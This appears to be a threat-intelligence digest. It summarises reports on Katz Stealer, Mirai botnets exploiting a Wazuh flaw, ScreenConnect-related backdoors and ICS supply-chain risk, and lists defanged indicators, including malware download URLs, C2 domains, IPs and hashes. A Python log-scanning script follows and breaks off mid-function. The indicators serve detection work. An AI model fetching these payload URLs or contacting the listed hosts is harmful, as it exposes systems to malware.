sha256=abd4263c97ab33b22f67e581ebb09ec7b98e4084dd32a7eca6502d3737715769, - sha256=1367dcf619cb935dc08d349fc18d3f9726cfceff151f4d57beff45591712189c, - sha256=062c0a5c8f484bc975b3e5490718cc5c7f732f7f53ce35d81e94cd83c273f78b, - sha256=2bd6b5cbeddab8b01e14ed4c073afdbd4316340aada77e3e55ba5e1af21652f7, - sha256=6bd191586c52ecd2a3496616838753db21156d52854a99b7d3fcbf9be0a5184a, - sha256=1c6c79b07e45630debe31362e4c89ffab3560c4712470f7af891bb31539d153a, - sha256=e9b0cc2118a7a07709b56f7358c07f4a2959f81c87da5f565fa08382768fac8b, - sha256=e145db8668b15278cc55b723df9f296103ef2ea3511d90e2bbb2ffa5291d4ae4, - sha256=0d44ff778dbecf8d951c54c199bd35ba0fe5ac817d5ef61b2fe998dfdb794560, - sha256=6fdeb1c2f4b5bc4ff6ea9635ca72d8670c07cfd17d3b7779caee22b96727f732, - sha256=34f50a5215c544cbd2ce67bcbf89cf2aee798c56cfb9e225e57e8c8270021210, - 
sha256=494460a17bec58d47212c907e7e7706dc80e99b27a022558637caebc2867e574, - sha256=11464f7ac40e3e5f771dfe19aee3b3d21cf526a11429038ba9de4c9d7e4bb42a, - sha256=bfc1064d3624c7bc68ef6b8ce2b0f40229d5981472c8b443c58f38bf3f461b2a, - sha256=2fd9e14830bbeef24fdff29a850a6164af4c4722d742185e022df9106029b587, - sha256=3f4b5b22b53f2fdeb7a82c94ac4d846f1e4ac0e9d055020f2f063598025b4674, - sha256=f10bd5443148d47fbf7c6a6998651eb9bda4c7c9213f9e5a65a76e98637cb748, - sha256=881a84477b509e2e63b70915055b9af1d12cf8fde9fb5031823c8c2a38c8979a, - sha256=4b268cfbdb86017f6271f09eb2aa54334de24d0ed12cfeb26fbb3dd8e104a8d3, - sha256=8d8d21f2c28f3e44b7253583e04d11cf7e7453dab139c187201f80e70d89b579, - sha256=8684e74d35baab30e8f8af7db486c2a339d3063feb2074109b8c96c1fea8313e, - sha256=6053d67835d2925c52263bdb9e4d7475e1015ea9cc4c8f994cfa7e0dbdb7e27f, - sha256=52ef3b610426343314e6c0f238e4460f0dffedbd022d33cb8f8e78e980d604e0, - sha256=50b102938d29cc7f61c67da6981545c69f70c7178d009ec1999ee0ddfe81ebba, - sha256=974285914961125d2963435c3dbe49b882cd88d95563b1ae3a62cd6240618c16, - sha256=a309753efca5242bbc9ca0e54a381ef2bac6625a0f591d79f8525e1ec196be4e, - sha256=1ec930716999f6a80a4f32624d8f907f2c7887e15b1c518d22f4aefe49367bba, - sha256=c902a206da5c3e1a4b8b8ba9f0e63f314e8cadcf044c25f729176b29c19bcbbb, - sha256=8515d46da83fb649db969b2acca47cd10f232174af358560210b362a56594fd1, - sha256=908ef89767bcd583edb96a8c12f3046b9db522cc7310e2c20799881d7bf75f9d, - sha256=da43703c733a1b0af183fdb61877b5c15651c21ffcc3a49c6addc83d76c10329, - sha256=91c2fbc594469839ad062e7cf359f2451fe8a14f041d8afe515ceab800c35133, - sha256=fbe1970d89b8546cd57522bf479e8be08fec4f3df9bdf79d0f3436250ce38379, - sha256=76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358, - sha256=e4fff1e153ef46a29865f28df724e7a3246809d9ae75a7546b580938acbbcb73, - sha256=184a400fe334027ff287ad0cf83c165fdf4605507c83ec054fb2b544f877163c, - sha256=ee6a58d1e3ce4f2e7fac7bb3c1f1c24836bcc79f456035aede52b7d14a7de77f, - 
sha256=1d17937f2141570de62b437ff6bf09b1b58cfdb13ff02ed6592e077e2d368252, - sha256=890cf9827361add4c2a6e5b93f7f9ccc9bb2f555e0cd535de144203f7156a959, - sha256=3869340562136d1d8f11c304f207120f9b497e0a430ca1a04c0964eb5b70f277, - sha256=bdd89826ab8d3e3c03833b1ea8e4b0a34c80f13bfa5882e5b82f896cec41d141, - sha256=c3dc66c657dd5a8a624c6eba67a6b8d1dada8ceeb13aab169c3a88c615831560, - sha256=ae4db4f97700aab607368a4d3a489215b2ddb5af60004b8da6e5b0c0220c2c25, - sha256=94bb5b8cc0a2d01d4f65294c816299b97dd38bc7be8fc9089dc90cc969995528, - sha256=8b7be1efcddddc3a29ae0514a6ae758e7f86be193ffe380e5e1e38dc22affb38, - sha256=e300c44b45b07f3766586e500f4f3596c23ffd80171eaa5334bb4db3e8d027e0, - sha256=41c671332b58f92187e32771ed1ba86c1ed256e36f036f74c91cf1aa7db07bc2, - sha256=f015da1f2ada32f734b81aa282bea62840cd84afaa353ca52d5e2d0c82e705d1, - sha256=c2f1c765b03b4ae0c08455c2b5e917ba8564ad945c3580a1e622169aad67807a, - sha256=f4f02429e8e1e966203d69610c31ae94ad4d34de10efd5edc4669ce067c4de4f, - sha256=3bdaa78077bd71e40b62ec2d6797c027f0b8deba9c3a7de9eb22823ad05c8201, - sha256=4d03c2a47265eab0c87006a4a2965fcf394fbdabb8e86cbe16b36376d04b8143, - sha256=50a5e6a357c841e6c2058ee658c70756da4b803f2a4f6d2cf96ab882a03a5294, - sha256=809b54b0f6092cad1a764872acb9a31ed99792589b84cdb279b4b1d15e8ec8e2, - sha256=de5f6cc6a3eaee870f438a43e1e262283124aa1cfa11ad395a05c4bff026c09f, - sha256=809050c6f29e80e9d0918060634df601ae12b27cc50439f4c123b6301ce26043, - sha256=1e54b2e6558e2c92df73da65cd90b462dcafa1e6dcc311336b1543c68d3e82bc, - sha256=2ba527fb8e31cb209df8d1890a63cda9cd4433aa0b841ed8b86fa801aff4ccbd, - sha256=9953bbe13394bc6cd88fd0d13ceff771553e3a63ff84dc20960b67b4b9c9e48e, - sha256=4d0663cff0c5c3f29c81e9aefd37f16a318ff638986ecc60e9bce6c90b72606b, - sha256=0e71728e5e6a762923fc0372e2047e0d969bcc5efbf4f3010df2ff6576cab725, - sha256=ebfdea1721914a504465ea474edc3f823c3e13fc71c86f04f4793c61e5070d92, - sha256=2938261c867331e12e7cff9ee28366f3986986108eeb00507db74cf0d7b6aad2, - 
sha256=c220f9ba0ee8445ab6d36f19d7cf24fd6df72eea41b9ba40f585451ee24c0f6d, - sha256=9a4e39fcb4033a9c849890085b67faea7265eaf56744e77aa8180b1834b7e14a, - sha256=d0add7a41b8c78ab0134752665278b9544d417b244a788c620c5da5215b515c0, - sha256=5072735b87e62c0239099fcd3d74a677e1b4c6497e0b17ed8ea4c83778c13039, - sha256=aadf323d8052da80c761ab9d05717603804405ee33e624926009a30d857d6d1a, - sha256=36b79a3eca6d0ee23daf10c436f4ec5c8c279fbfd79c965c7e37515c148c3c5b, - sha256=401c5d2157d303df1ca465ff4097ee4474574c39f614cbb5734193a3917354c0, - sha256=4665c7b360b18496be00246eb3bc886e83b22028e95156101bf73bf0c48dddd3, - sha256=056451b28c4bfe6bf1536c1d67b33f312a06c656cd3c633f40cc5f5b85c6528b, - sha256=6b999462e434b258980b1532f5d0c3661646f7bb9567aecdd748f6be10dcb740, - sha256=0c8b9fa67d1d149636b560a2ec8f9c50cd41ebf11f5691cf2ea39f1d057f8ff1, - sha256=0c8d22d58a747ceccad56317b9c0afe58fe4b9f3c2138134e978e43a5f5ac390, - sha256=e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5, - sha256=a5febb4b5ba6572594de87d2a9de6df65d49da755385bf3d3d4d054772ce493c, - sha256=c3ecbc6023bfa170c31eaf7033b68495798e305111ca9f2f203f58b9ec942384, - sha256=8246ba12e1ebfcdbaed80a7ba1ec65423f23b9b7820c0dfb07ee38baa83d6a20, - sha256=1f38a9e17e5096bca84b6ec87eb5470b2ce4450a6a03b3e41b38dbd91ab281da, - sha256=e9010ab2a031125f12225d8b1f19ac65bc03b87332dc5caa35028a577b9ca0fe, - sha256=f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5, - sha256=5e9362dba53021ab588e396e1cb28100718471f07c5dd5cafa6bf5728f014b97, - sha256=13265c0e32312a0763f3f8fed0f017a606355987ac9398bfb38f47c760ad32b0, - sha256=41be156c27dad780dd96493319dbd89228616573ec7d731ca2e642ee0e554af3, - sha256=58cb66268b58d7ca77fb5f5df668ffa76a23854a6267914fc3973dbf92394612, - sha256=8d5d4e48ce623085efec9a56981b0ab74f1180f3b42614df88f11da543f2849a, - sha256=c5fa7fd1ff45c5cfaec851795f4c2e15326046f3022778bdf6f37b7b1dd75f5c, - sha256=c6e672b832dcf78490ea8d128f5f8a647274b9b98d851bc36ff07b2d3a0d7ba3, - 
sha256=191a8766da98b1f992072045905cf82c771d8cb9f697d08873686778dc70c7f6, - sha256=982ec3915d458007e960a4dbe0c9c914825fd88c1739ab3f7edfebaaa10bc265, - sha256=710e80fb64e08f20ab58c20ccdbc966f6e3b54511775e8ed99ff0bcf51690227, - sha256=4814ea15da1826d9ef400c3e607ca87d11b18b8a1b4f43f13afa93467429dfb8, - sha256=952cac8ec226b4ed38a2631c220bb80409edbc0c9a0ac2793b879a259172282b, - sha256=f491d8b510ee283d24d40aa5233743d8cf834a164d0f681af8870dd1f35b734c, - sha256=a67d73996a5479312f4a4ea4fccdde293695359aa6b6da06c01248066a7131f9, - sha256=194d739fa93970d63dade70aae7c3b9ac8a6938be9f0e2d470d3adf8c106bfad, - sha256=3c6dacad931bf24eb953858c0bb3e49fe821d111d9003c9fffcb814ae6e8edf8, - sha256=65b601f8154bddd42cb31ce166697335e79f2e713655865bee66654c51e7c1dc, - sha256=b417396efb07943d380182d610da313607308a74fc0dc77318407a5248cbab6e, - sha256=81e6adebca376dfbda0484ab4475d0ac76a1e86afe0930e45ab7137cfd378d38
email: kasalboov@web[.]de, ilya_b@hip-hosting[.]com
Title: Understanding Katz Stealer Malware and Its Credential Theft Capabilities
Link: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities
Summary: Katz Stealer is a sophisticated information-stealing malware-as-a-service that emerged in 2025, known for aggressive credential theft and stealthy operational methods. It is primarily distributed via phishing campaigns and counterfeit software downloads, featuring a modular payload that enables rapid data exfiltration. The infection process begins with a JavaScript dropper that initiates a PowerShell script, which then downloads a disguised payload. Katz Stealer employs advanced evasion tactics, including a UAC bypass and process hollowing, to maintain persistence and operate under elevated permissions while extracting sensitive information from web browsers and cryptocurrency applications. The malware establishes persistent communication with its command-and-control server to facilitate real-time data theft and employs unique indicators of compromise to highlight its presence within compromised systems.
Threats: katz_stealer uac_bypass_technique process_hollowing_technique chromekatz_tool dll_injection_technique credential_dumping_technique
Indicators of compromise:
-------------------------
ip: 185[.]107[.]74[.]40, 31[.]177[.]109[.]39
domain: twist2katz[.]com, pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev, katz-stealer[.]com, katzstealer[.]com
url: https://archive[.]org/download/new_image_20250413/new_image[.]jpg
hash: - sha256=22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb, - sha256=e4249cf9557799e8123e0b21b6a4be5ab8b67d56dc5bfad34a1d4e76f7fd2b19, - sha256=fb2b9163e8edf104b603030cff2dc62fe23d8f158dd90ea483642fce2ceda027, - sha256=0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7, - sha256=4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7, - sha256=6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d, - sha256=e73f6e1f6c28469e14a88a633aef1bc502d2dbb1d4d2dfcaaef7409b8ce6dc99, - sha256=2798bf4fd8e2bc591f656fa107bd871451574d543882ddec3020417964d2faa9, - sha256=e345d793477abbecc2c455c8c76a925c0dfe99ec4c65b7c353e8a8c8b14da2b6
email:
Title: Two Botnets, One Flaw: Mirai Spreads Through Wazuh Vulnerability
Link: https://www.akamai.com/blog/security-research/2025/jun/botnets-flaw-mirai-spreads-through-wazuh-vulnerability
Summary: The remote code execution vulnerability CVE-2025-24016 in Wazuh servers has been actively exploited by two botnets distributing variants of Mirai malware. Disclosed in February 2025, this critical vulnerability allows attackers to execute arbitrary code through malicious JSON files uploaded via decentralized API requests, with exploitation attempts first identified by the Akamai Security Intelligence and Response Team in March 2025. The first botnet, "Resbot," targets Italian-speaking users, leveraging the vulnerability to execute a malicious shell script that deploys the "morte" Mirai payload, while the second botnet began its operations in May 2025 with similar tactics, utilizing the service to spread the "resgod" variant, also aimed at IoT devices and showing scanning behavior for FTP and Telnet vulnerabilities.
Threats: mirai resbot_botnet vega_locker
Indicators of compromise:
-------------------------
ip: 176[.]65[.]134[.]62, 176[.]65[.]142[.]252, 209[.]141[.]34[.]106, 65[.]222[.]202[.]53, 196[.]251[.]86[.]49, 104[.]168[.]101[.]27, 176[.]65[.]142[.]137, 104[.]168[.]101[.]23, 79[.]124[.]40[.]46, 194[.]195[.]90[.]179
domain: nuklearcnc[.]duckdns[.]org, cbot[.]galaxias[.]cc, neon[.]galaxias[.]cc, pangacnc[.]com, jimmyudp-raw[.]xyz, gestisciweb[.]com, resbot[.]online, versioneonline[.]com, web-app-on[.]com, assicurati-con-linear[.]online, webdiskwebdisk[.]webprocediweb[.]com, continueoraweb[.]com, ora-0-web[.]com, multi-canale[.]com, eversioneweb[.]com
url: http://176[.]65[.]134[.]62/w[.]sh, http://104[.]168[.]101[.]27/sh, http://176[.]65[.]134[.]62/bins/morte[.]arm, http://176[.]65[.]134[.]62/bins/morte[.]arm5, http://176[.]65[.]134[.]62/bins/morte[.]arm6, http://176[.]65[.]134[.]62/bins/morte[.]arm7, http://176[.]65[.]134[.]62/bins/morte[.]i686, http://176[.]65[.]134[.]62/bins/morte[.]m68k, http://176[.]65[.]134[.]62/bins/morte[.]mips, http://176[.]65[.]134[.]62/bins/morte[.]mpsl, http://176[.]65[.]134[.]62/bins/morte[.]ppc, http://176[.]65[.]134[.]62/bins/morte[.]sh4, http://176[.]65[.]134[.]62/bins/morte[.]spc, http://176[.]65[.]134[.]62/bins/morte[.]x86, http://176[.]65[.]134[.]62/bins/morte[.]x64, http://176[.]65[.]134[.]62, http://209[.]141[.]34[.]106, http://104[.]168[.]101[.]27/resgod[.]mips
hash: - sha256=dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9, - sha256=7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549, - sha256=64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f, - sha256=4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed, - sha256=811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc, - sha256=90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353, - sha256=8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6, - sha256=c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1, - sha256=6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a, - sha256=9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b, - sha256=be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0, - sha256=e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0, - sha256=4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6, - sha256=a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc, - sha256=941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
email:
Title: ConnectWise ScreenConnect Attacks: Continued Surge in RMM Tool Abuse
Link: https://www.cyberproof.com/blog/connectwise-screenconnect-attacks-continued-surge-in-rmm-tool-abuse/
Summary: On February 13, 2024, a serious vulnerability in ConnectWise ScreenConnect versions 23.9.7 and earlier was identified by an independent researcher via the ConnectWise vulnerability disclosure program. This vulnerability was later linked to cyber incidents in May 2025, involving the CHAINVERB backdoor used by the UNC5952 threat group, which employed malicious droppers in phishing campaigns targeting global financial institutions. CHAINVERB, operating as a downloader, exploited digital signatures in Windows executables and utilized concealed command-and-control URLs within its digital certificates to execute further payloads. Investigations revealed that the attackers conducted targeted operations using phishing emails with malicious PDFs to distribute trojanized executables signed by ConnectWise, indicating a coordinated threat to the financial sector.
Threats: screenconnect_tool chainverb unc5952_group spear-phishing_technique
Indicators of compromise:
-------------------------
ip: 176[.]123[.]10[.]175
domain: yertoje[.]uzhelp[.]top, polarof[.]koyhelp[.]top, www[.]v4shelp[.]top, helpw8[.]top, web[.]bcqhelp[.]top, web[.]mryhelp[.]top
url: https://visionary-clafoutis-308e89[.]netlify[.]app
hash: - md5=a01a80d8c1f665eda5a81391a1ed0024, - sha1=b1568b6001450646e2526f6836ca77cb8b3fc7e0, - sha256=d6d75807c23ebfb34eceaa10037f2a911dd50128135cb968811c50b0f1d69eea, - md5=b552a9a824d10d0b8385005cba442544, - md5=180f9294e3e2418a460dee6d9e40291a, - md5=f2ba4c8023add555f68732460dc9d4c7, - md5=cc9b850b23700158b2b3d14cc45135eb, - md5=ca80f7198ca049c40a8b32d0c317595f, - md5=5cb2a3602f1056a8fba8072fbf80561a, - md5=296d63f69293f56fb1ffafeae04a756f, - md5=b05f9798620028f6f88a04c672bfdba2, - md5=848db3f9ccbcd65aa0ff91da10d6ac22, - md5=77e093ff9a44fe0266d5e1b736683efe, - md5=3ba3a33626207a86999baeb188747d5a, - md5=a493cf8de03552a775f738d77ad6e457, - md5=2947efb92b290724c7b3b61b7d2a0195, - md5=3e7f5c2ab812e00d0a2a443f7aa5eb90, - md5=d8ff63a61f6d8c3379b4c64eb624d6b7, - md5=b64d3d38de70cade9b423e87c571a65c, - md5=11099bafe8fb1dac645f72e9a993cb0a, - md5=99ee3de2e32f7a05df15738023304bc5, - md5=87648c0d0f9a255a22274249948a11a0, - md5=85e12111e6913b3cd30f1f21caba1462, - md5=50afa07549676ea22c0e27f6aa583af0, - md5=0f249172ac7501af462248588daaab50, - md5=6048ce6db60de443e7b98c41f16c6952, - md5=b273d861bfb4f8daabe143c7a74de547, - md5=6b32ce8781e54e27c1fe42f0d2bdbe0e, - md5=aa251635e7e97d9276a93ceabbacdbb1, - md5=054c9912afa050b56082ca8584ced948, - md5=71af888e3467c69e45b98f95aeafe68e, - md5=bf382d8b554244e70a7e13ac363365a1, - md5=b049c27324c3a01311f20d5db294817f, - md5=64d4977383bc99c6832e5e015a46889f, - 
md5=5cd0afa3d3bb5226e84b274175d8178b, - md5=47208e7f253f38e574fa150794fa5890, - md5=3bf8b746e02db924c6af2220b531d1b2, - md5=4b127db25684359a302c55f49db5c708, - md5=3ce16e7fc2da4be70a72e7e48609f67a, - md5=d4bf0c9b291e039178495b432943cdbf, - md5=e3b3aa27254565637b0b1a1fe2faed3b, - md5=db4879df2426ca0cc100f7a72fc3418e, - md5=2bc2cd08e21bef440ec6c83eb0068442, - md5=25e1336f22b27b3cb5d7bc91abdd1a9a, - md5=dc531753ba238d56549445ea7d1a5ca1, - md5=7ffdbd968f6e1db7eae9e058ac79e9bd, - md5=de4c6b36cf1b707eed2b3b3c5dd2e718, - md5=dfd4f7657cf7cea7ba272c1b791cd5a0, - md5=7203f98c19dd4859488b688fc775a8ef, - md5=fbe9e18d77342dcac9eeae4977ffb3c6, - md5=893bb4521b75b301cfb7b3106c055c12, - md5=8623e275f3a769bc2528fdc39728e244, - md5=49c5a54f2864bf3e0cdb9343d897acda, - md5=da8e03697343af47fc7e29ed56d4663c, - md5=fd8c225bcdf57c6f0fb5c6f111b47ef5, - md5=ea7164cf3ef1b9037d7bcfae09f23aa3, - md5=de2de1eb68b066c0e69921f51234d40a, - md5=715a252cea21f0d4f4ae7f0723baf625, - md5=f03a90f320c3677ba1b3e16ea64b3f49, - md5=d0f76accd3c94906fb2b66cab84d96f8, - md5=4c096113de849cda645135fa7b3bb5ca, - md5=07c8988b88d404b1dee9adf977255a44, - md5=2675cc6b4f9698befbcb508cd32178a1, - md5=288c8506e0c8784e8285cedc877d1170, - md5=a66f45a7d2d065ba375adfd790ebcbc4, - md5=1d02925bc24b0edc1b0603c45e93a696, - md5=c5a85316c07b6e7088c2c409f1febf22, - md5=b07b433cddb3f795331c3f27dd8aa189, - md5=6ebed61e44202aedc4d1ba58c16d4c5d, - md5=4cbe999b7105a8111bef31df5e103fc1, - md5=421e764a03c725bf64008e60ddb15a84, - md5=1448b06d2157f1dbe4e8f449f737214a, - md5=4556288adc268b13695ffddb58ad329d, - md5=7086c4d6d0e0196f08afb9cf8c80e0a8, - md5=1c60490885081a0782380118f5e36e58, - md5=69f3c1b39b1717297b8af0b324fa37fb, - md5=1796319d7ff9d14843f56d1dc15c79a3, - md5=1967d49246e5d1dbfa3fb4271ca353b1, - md5=5b2f84d6b552ca9bd0351df357158ea5, - md5=0173c335860852cb6145f14500abb149, - md5=1984543d91123d8c869bdd42b929f015, - md5=3ca077d1b43e2fd567d3e49490f86d5b, - md5=f92cd489de2b5d82b4c3998b40cb3df8, - md5=726c1741ef33c9b0dfdfb1d8e53ce0fa, - 
md5=d8d0cac5170380585f806b897cd14b9d, - md5=d33b15e2850f533af9e46c7846d4bcc5, - md5=bf07d7a18fc32261c0a536919fed5e69, - md5=46310732752848582065e901f5a6a233, - md5=89cd5cbe803b8d4b0f27c9750a7f9a04, - md5=08cf33bd7d34ef0c49b17bd53e5ee83c, - md5=fca6d5ce3fe97f21615cbe08d688b2ac, - md5=60224f437f45761c083fe11c2d88b0d7, - md5=357e4a0b14e8c481008e79df870ff729, - md5=3796ab8db2ca9dc884a591a69b3715d4, - md5=333dddd525c3910a319b363f77d0bc39, - md5=7565cb88cae52972604d22a729e7a693, - md5=91444bd4b6bc087ea1fff367fe029749, - md5=7d6a0116622f6f519f607ba0a9e7add4, - md5=ebc8e0604ae3b66aac419d6b309574db, - md5=f86462bae226b4f9c65f83f224621af6, - md5=c4cb22e51ecdce8b1b9398b96c89171c, - md5=e2e1b95b55dd0d7fc5f983b4d518db0b, - md5=18335fefbc5885cfc42df41ebc4ef31b, - md5=9d5a9f7b2eafc725c2c2f8f3b55ca17e, - md5=684a68dc8e1f5929906ea5f5fee005b4, - md5=2254eca6a943144866f648514e3ed8c1, - md5=2ee07292c98fa68c37775a3e8f1aa9ae, - md5=4619beab0955d17c69b6a03d725cab26, - md5=4a5f9323e22265ba5572b40a0bcf9e60, - md5=b8e1fc27a3a78c6ec296f1060702bd35, - md5=f32535d6fd244010c2c03f3015efb386, - md5=5d5cc5d15a2186ca442a0d865d2c6c6d, - md5=fc52076dceba92f778e3ddfc779b82e4, - md5=a87b746ce6e4eb54300fdccd2ecd653f, - md5=4c878ac8a33ce5201e2a25abd081a8d0, - md5=485ce9a3df08af7369b5ad055f3d1a99, - md5=93ee0c45cf836ff300145bd069ba9107, - md5=bccb4b2ab4b27ff1c632533e0584cf79, - md5=dd602d27f47c1c3f5c597960db8c1a51, - md5=186216fc1e1327ab007aedd8188231e7, - md5=f1c1ac1c5cbc3bc1ac1b8e03440086e2, - md5=d60a9a14c3fc5bc24b1e0f8638bcfb51, - md5=f62e18c391a571d5b293c4cf7d220543, - md5=79699e683b1f5db921656ffb0f0d8c1e, - md5=89f68ff5e4965218126f8e616a7a7798, - md5=99f9f82711ec2c53ef7ff114b80ebb76, - md5=b8e48661ea97a690308d8987625cbf48, - md5=7b3f4d34b8d3518c092d81506df05103, - md5=7c0b9116ad3584b3104a54281bcff793, - md5=51976d5a76b203b25bbc514d6129de9c, - md5=9fb707a0ab4259078495c94bb6b6a2e9, - md5=42c0a87246ee89b37c0e7846e07627e5, - md5=690fbe64c5cf40f4e43ec4d2193e66b0, - md5=73f9ecfae60b17cb6331b0800bd0c16f, - 
md5=06705be1357579f491aa5abb67aca22c, - md5=d714cea27c300d0b2789098763a884ab, - md5=32c7b6a978b2c5c19a983d50fd52c0f7, - md5=7af30ba52976fec95c0fd86691a7329f, - md5=cebeb96d7e2d36264fb6f50570051ee8, - md5=3d70e84758aef8a192f95e4e092cb769, - md5=8efcb17298c5af05639f85e042f5f69c, - md5=f2896464e2c3389ad4c98eccb19f9acd, - md5=e9ea1026cf176f4d497a27d0c856bedf, - md5=8542228028211206428187271d831981, - md5=b7386ff0ad31f28448c4704d30b5cfeb, - md5=be2ad88838969e92010fab7d958ee0f2, - md5=d32ad97efa23f8ad4269a5e59589703b, - md5=a050291d555cf05c1b5fd6049ff85c8c, - md5=68320761a01f9df5f1bdc71c94326311, - md5=d983cebe16603091c83e39b5f4eb266d, - md5=a1afebafe5a7598cef0ef8f348d49996, - md5=18fbd1aec9f66d3b92a2d89f81bcc929, - md5=b28bf1217eaab7dc2281beacf8c00f6a, - md5=d1f2de5b461f3344f4274806c4ff1ac1, - md5=bbcb31367235ceb97549bf432587d6f2, - md5=3f7cc1cb3da89b1ad57bc35bc73d54a9, - md5=ef3c98feca4c88c14c78e890ecdd705e, - md5=00f7c19a8494bfa0d734648d18c464df, - md5=a9bfee1aa5068c03ce1b4580698f000a, - md5=781add1dd969276ba231c975ccc7a15f, - md5=54d42f80e8e09f1568f335be20393cb5, - md5=1ee9703849ab4d406c9c57e35a0c211f
email: russ@oshlaw[.]com
Title: Proactive OT security: Lessons on supply chain risk management from a rogue Raspberry Pi
Link: https://www.darktrace.com/blog/proactive-ot-security-lessons-on-supply-chain-risk-management-from-a-rogue-raspberry-pi
Summary: A recent insider threat was identified when a vendor left a rogue Raspberry Pi device on a customer's Industrial Control Systems (ICS) network, highlighting supply chain vulnerabilities. Historical incidents, including the 2014 Havex attack and the 2018 semiconductor breach, exemplify the risks associated with compromised software within ICS environments. Darktrace's analysis pointed out unusual metadata linked to the device's encrypted connections, indicating potential risks despite lacking overt malicious signs. Additionally, advanced techniques like ClickFix baiting have been employed by threat actors such as APT28 and MuddyWater, utilizing social engineering to execute malicious commands and allowing for lateral movement within networks, thereby increasing the potential for sensitive data exfiltration.
Threats: supply_chain_technique watering_hole_technique havex_rat teamviewer_tool lolbin_technique mitm_technique clickfix_technique aitm_technique fancy_bear_group muddywater_group spear-phishing_technique fakecaptcha_technique xworm_rat lumma_stealer asyncrat
Indicators of compromise:
-------------------------
ip: 212[.]237[.]217[.]182, 193[.]36[.]38[.]237, 188[.]34[.]195[.]44, 138[.]199[.]156[.]22, 185[.]250[.]151[.]155, 64[.]94[.]84[.]217, 94[.]181[.]229[.]250, 216[.]245[.]184[.]181, 168[.]119[.]96[.]41, 205[.]196[.]186[.]70
domain: rkuagqnmnypetvf[.]top, tlgrm-redirect[.]icu, diagnostics[.]medgenome[.]com
url:
hash: - sha256=34ff2f72c191434ce5f20ebc1a7e823794ac69bba9df70721829d66e7196b044, - sha1=10a5eab3eef36e75bd3139fe3a3c760f54be33e3
email:
This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
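The indicator lists above are printed defanged (`[.]` in place of `.`) in a fixed `ip:` / `domain:` / `url:` / `hash:` / `email:` layout. The Python below is an added example, not code from RST Cloud or from any of the cited reports: it parses indicators in that layout (a constructed excerpt built from values in the Katz Stealer and Mirai/Wazuh entries above), refangs and normalises them, and sweeps a few constructed DNS, proxy, netflow and EDR log lines for matches. Client addresses, host names and file paths in the sample logs are invented. Note that the `archive[.]org` indicator is matched only as a full URL: the host itself is legitimate, so treating it as a domain indicator would flag every visitor to that site.

```python
"""Refang the digest's IoC lists and sweep sample logs for them (added example)."""
import re

# Constructed excerpt in the report's "Indicators of compromise" layout; the
# values are copied from the Katz Stealer and Mirai/Wazuh entries above.
IOC_TEXT = """\
ip: 185[.]107[.]74[.]40, 31[.]177[.]109[.]39
domain: twist2katz[.]com, katz-stealer[.]com, katzstealer[.]com
url: https://archive[.]org/download/new_image_20250413/new_image[.]jpg
hash: - sha256=22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb, - sha256=e4249cf9557799e8123e0b21b6a4be5ab8b67d56dc5bfad34a1d4e76f7fd2b19
email:
ip: 176[.]65[.]134[.]62, 104[.]168[.]101[.]27
domain: resbot[.]online, nuklearcnc[.]duckdns[.]org
url: http://176[.]65[.]134[.]62/bins/morte[.]arm, http://104[.]168[.]101[.]27/resgod[.]mips
hash: - sha256=dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
email:
"""

IOC_KINDS = ("ip", "domain", "url", "hash", "email")


def refang(value: str) -> str:
    """Undo the report's defanging so values compare equal to real log data."""
    return (value.replace("[.]", ".")
                 .replace("hxxps://", "https://")
                 .replace("hxxp://", "http://"))


def parse_iocs(text: str) -> dict:
    """Collect 'kind: a, b, - algo=hex' lines into refanged, lowercase sets per kind.
    Lines whose prefix is not one of IOC_KINDS (Title:, Summary:, ...) are skipped,
    so the whole report text can be passed in unchanged."""
    iocs = {kind: set() for kind in IOC_KINDS}
    for line in text.splitlines():
        kind, sep, rest = line.partition(":")
        kind = kind.strip().lower()
        if not sep or kind not in iocs:
            continue
        for item in rest.split(","):
            item = item.strip().lstrip("- ").strip()
            if not item:
                continue
            if kind == "hash":
                item = item.partition("=")[2]  # 'sha256=<hex>' -> '<hex>'
            iocs[kind].add(refang(item).lower())
    return iocs


# Extractors for the artefacts a log line may carry (lines are lowercased first).
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://\S+")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def scan_line(line: str, iocs: dict) -> list:
    """Return (kind, indicator) pairs for every report IoC present in one log line."""
    low = line.lower()
    hits = []
    for digest in SHA256_RE.findall(low):
        if digest in iocs["hash"]:
            hits.append(("hash", digest))
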